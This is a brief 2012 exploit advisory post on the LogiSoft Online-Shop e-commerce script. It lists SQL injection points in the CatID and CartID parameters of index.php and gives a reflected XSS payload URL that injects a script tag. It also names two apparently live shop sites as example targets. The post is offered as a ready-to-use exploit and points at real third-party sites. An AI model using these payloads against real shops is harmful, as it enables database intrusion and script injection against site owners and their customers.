facebook facebook twitter rss

LogiSoft Online-Shop / E-Commerce-System Sql Injection/XSS Vulnerabilties

Author: AtT4CKxT3rR0r1ST , Published: 20-06-2012
#######################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.logisoft.be/
#######################################################################

===[ Exploit ]===


Multiple Sql Injection
=======================
http://SITE/index.php?CatID=sql
http://SITE/index.php?CartID=sql


Example:
http://www.alltronic.be/shop/
http://php.bene.ws/shop/



Reflected XSS
==============


http://SITE/index.php?CatID='"--></style></script><script>alert(1337)</script>


#######################################################################

Like us on Facebook :